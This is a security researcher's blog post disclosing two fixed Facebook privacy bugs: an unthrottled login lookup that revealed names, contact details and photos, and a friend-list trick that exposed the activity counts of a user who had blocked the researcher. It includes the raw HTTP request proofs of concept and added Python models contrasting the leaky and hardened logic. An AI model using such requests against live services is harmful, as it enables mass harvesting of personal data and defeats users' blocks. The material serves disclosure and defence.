Monday, 1 February 2016

Information Disclosure in Facebook - PoC by Shailesh Suthar



Hello!

I found a vulnerability through which I was able to disclose the following information about Facebook users:

> Full name of User
> Mobile number or Email Address
> Profile Pic

Endpoint :

POST /login/async/known_user_block/?login_id=[MOBILE_NUMBER or EMAIL_ADDRESS] HTTP/1.1
Host: www.facebook.com
Content-Length: 44

__user=0&__a=1&__dyn=x&__req=1&lsd=x&__rev=x

This endpoint was not rate limited!

This was not ordinary user enumeration: the full name and profile picture were disclosed, and mobile numbers/email addresses set to "only me" privacy were also disclosed via this endpoint!
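The two defects described above are the lookup returning private contact fields to anyone and the absence of throttling. The following Python model, added here as an illustration and not code from the original post or from Facebook, shows the leaky pattern next to a hardened version. The hardened handler is my assumed fix, not Facebook's actual one: it only reveals the "known user" block when the caller presents a device token previously bound to that account, returns an identical response for unknown identifiers and unproven callers, never echoes email or phone, and applies a sliding-window rate limit per client key. All users, tokens and identifiers are constructed sample data.

```python
"""Leaky vs hardened 'known user' login helper (added example, constructed data)."""
import time
from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass
class User:
    user_id: int
    name: str
    email: str
    phone: str
    pic: str
    contact_visibility: str            # "public" or "only_me"
    known_devices: set = field(default_factory=set)  # device tokens bound to this account


# Constructed sample directory; none of these are real accounts.
USERS = [
    User(1, "Alice Example", "alice@example.test", "+10000000001",
         "/pics/1.jpg", "only_me", {"dev-alice-laptop"}),
    User(2, "Bob Example", "bob@example.test", "+10000000002",
         "/pics/2.jpg", "public"),
]


def _find_by_login_id(login_id):
    """Resolve an email address or phone number to a user, or None."""
    for u in USERS:
        if login_id in (u.email, u.phone):
            return u
    return None


def vulnerable_known_user_block(login_id):
    """The pattern the post describes: any caller, any identifier, no throttling,
    and the response carries name, picture and contact fields regardless of the
    user's privacy setting."""
    u = _find_by_login_id(login_id)
    if u is None:
        return {"known": False}
    return {"known": True, "name": u.name, "pic": u.pic,
            "email": u.email, "phone": u.phone}


class SlidingWindowLimiter:
    """Allow at most `limit` calls per `window_s` seconds for each key.
    The clock is injectable so the behaviour can be tested deterministically."""

    def __init__(self, limit, window_s, clock=time.monotonic):
        self.limit = limit
        self.window_s = window_s
        self.clock = clock
        self._hits = defaultdict(deque)

    def allow(self, key):
        now = self.clock()
        q = self._hits[key]
        while q and now - q[0] >= self.window_s:   # drop hits outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def hardened_known_user_block(login_id, client_key, device_token, limiter):
    """Assumed fix: throttle per client, gate the block on a device token already
    bound to the account, give the same answer for 'no such user' and 'not
    proven', and never return contact fields."""
    if not limiter.allow(client_key):
        return {"error": "rate_limited"}
    u = _find_by_login_id(login_id)
    if u is None or device_token not in u.known_devices:
        return {"known": False}                     # indistinguishable outcomes
    return {"known": True, "name": u.name, "pic": u.pic}


if __name__ == "__main__":
    lim = SlidingWindowLimiter(limit=3, window_s=60)
    print(vulnerable_known_user_block("alice@example.test"))
    print(hardened_known_user_block("alice@example.test", "client-a", None, lim))
    print(hardened_known_user_block("alice@example.test", "client-a", "dev-alice-laptop", lim))
```

The device-token gate is what makes the uniform `{"known": False}` response meaningful: without it, a fixed response for unknown identifiers would still let a caller distinguish registered from unregistered contact details, which is exactly the enumeration the post says this endpoint went beyond.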

That's all ;)

Actually, the mentioned endpoint was available to only a very small subset of users, so the impact was very low; otherwise this might be called a perfect privacy leakage issue!

Because of the very limited impact, I got the minimum reward from Facebook.
Thanks to Facebook security team for fixing this one!

Due to this one and one more, I am listed in Facebook Hall of Fame - 2016!

Update: On 10th Feb '16, I got an email from the Facebook security team on this ticket saying "After further review of this issue, we have decided to increase the reward to $1500 USD total."

I am very thankful to the Facebook Security Team for taking another look at this issue without my request! :-) It's impressive!

Thanks for reading!
  
Twitter : https://twitter.com/shailesh4594

Report Timeline:
============
5 December 2015   - Report sent
8 December 2015   - Asked for more information by Facebook (due to abnormal endpoint)
8 December 2015   - More information sent
18 December 2015  - Escalation by Facebook
29 December 2015  - Bounty of $500 USD awarded by Facebook :) (first bounty)
8 January 2016    - Fix deployed by Facebook
10 February 2016  - Bounty of $1000 USD awarded by Facebook :) (second bounty)
 

Wednesday, 29 April 2015

Privacy leakage vulnerability in Facebook - PoC by Shailesh Suthar



Privacy Leakage: counts of actions of a blocked user can be viewed.

Hello, I am Shailesh Suthar, an independent security researcher. I found a vulnerability through which I was able to view counts of recent updates of a user who had blocked me. It was also possible to view counts of updates regarding status, photos, games, comments/likes, music/videos and other activities separately!

PoC:
When we create a new friend list, the following POST request is generated:

POST /friends/edit/ajax/save_list/ HTTP/1.1
Host: www.facebook.com
...
 
fb_dtsg=AQHtqbvxxxxx&listname=NAME_OF_LIST&members[0]=PROFILE_ID_OF_USER&text_members[0]=NAME_OF_USER&__user=100002309650515&__a=1&__dyn=xxxxxEyl2lm9o-t2u5bHaEWCueyrhEK4xxxxxxxxxxxCqrZo8popyui9DBwIhEyfyUnwPUS2O4K5e8xxxxxxxxxxxx&__req=d3&ttstamp=2658172116113981185356757249&__rev=1711798


Then I modified two parameters as below:

            listname=Dummy
            members[0]=PROFILE_ID_OF_BLOCKED_USER

I received the response below:


for (;;);{"__ar":1,"payload":null,"onload":["goURI(\"\\\/lists\\\/ID_OF__FRIEND_LIST\");"],"bootloadable":{},"ixData":{},"lid":"0"}

The blocked person was added to a new friend list named "Dummy", and the blocked user was the only member of this list.

Adding a blocked person to a friend list is not in itself a security vulnerability (it is still allowed). So I checked the Friend lists page (https://www.facebook.com/bookmarks/lists).

A count was shown for the friend list, as pointed out in the image below!





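The root cause described above is an aggregate (the per-list activity count) computed over list members without re-checking the block relationship between the viewer and each member, so a single-member list turns the count into a per-user activity feed. The Python model below is an added illustration, not code from the original post or from Facebook; its data (user ids, activities, blocks) is constructed. It shows the leaky aggregation beside a version that filters blocked members at read time, and additionally rejects blocked members when the list is saved. Both filters are my assumed mitigation, not Facebook's actual fix, and applying the check at both points is a defence-in-depth choice so that lists created before the check existed are still covered.

```python
"""Leaky vs block-aware friend-list activity counts (added example, constructed data)."""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Activity:
    actor: int       # user id who performed the action
    kind: str        # "status", "photo", "game", "like", "music", ...


# Constructed sample data: user 42 has blocked user 9; user 7 has blocked nobody.
ACTIVITIES = [
    Activity(42, "status"), Activity(42, "photo"), Activity(42, "status"),
    Activity(7, "status"), Activity(7, "game"),
]
BLOCKS = {(42, 9)}   # (blocker, blocked)


def is_blocked_either_way(a, b):
    """A block in either direction must hide activity from the other party."""
    return (a, b) in BLOCKS or (b, a) in BLOCKS


def activity_counts(members, activities=ACTIVITIES):
    """Per-kind counts over the given member set. Pure aggregation, no privacy logic."""
    c = Counter(act.kind for act in activities if act.actor in members)
    return dict(c)


def leaky_list_counts(viewer, members):
    """The pattern the post describes: the viewer's block relationships are never
    consulted, so a one-member list of a blocking user reveals that user's activity."""
    return activity_counts(members)


def visible_members(viewer, members):
    """Members whose activity the viewer is allowed to see."""
    return {m for m in members if not is_blocked_either_way(viewer, m)}


def safe_list_counts(viewer, members):
    """Assumed fix at read time: aggregate only over members visible to the viewer."""
    return activity_counts(visible_members(viewer, members))


class BlockedMemberError(ValueError):
    pass


def save_list(owner, name, members):
    """Assumed fix at write time: refuse to create a list containing users who block
    the owner or are blocked by them. Returns the stored (name, members) pair."""
    blocked = {m for m in members if is_blocked_either_way(owner, m)}
    if blocked:
        raise BlockedMemberError(f"cannot add blocked members {sorted(blocked)} to '{name}'")
    return name, frozenset(members)


if __name__ == "__main__":
    print("leaky:", leaky_list_counts(9, {42}))   # viewer 9 sees blocker 42's activity
    print("safe: ", safe_list_counts(9, {42}))    # nothing leaks
    print("mixed:", safe_list_counts(9, {42, 7}))  # only user 7 contributes
```

The read-time filter is the part that matters for lists that already exist; the write-time rejection alone would have left the "Dummy" list from the post in place with its count still visible.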
I reported this to the Facebook security team, and it got fixed!
Thanks to the Facebook security team for fixing this one.


Report Timeline:
============
Dec 28, 2014 8:38pm  - Report sent
Jan 3, 2015 3:01am   - Escalation by Facebook
Jan 15, 2015 2:08am  - Fix deployed by Facebook
Mar 6, 2015 11:11pm  - Bounty of $1000 USD awarded by Facebook :)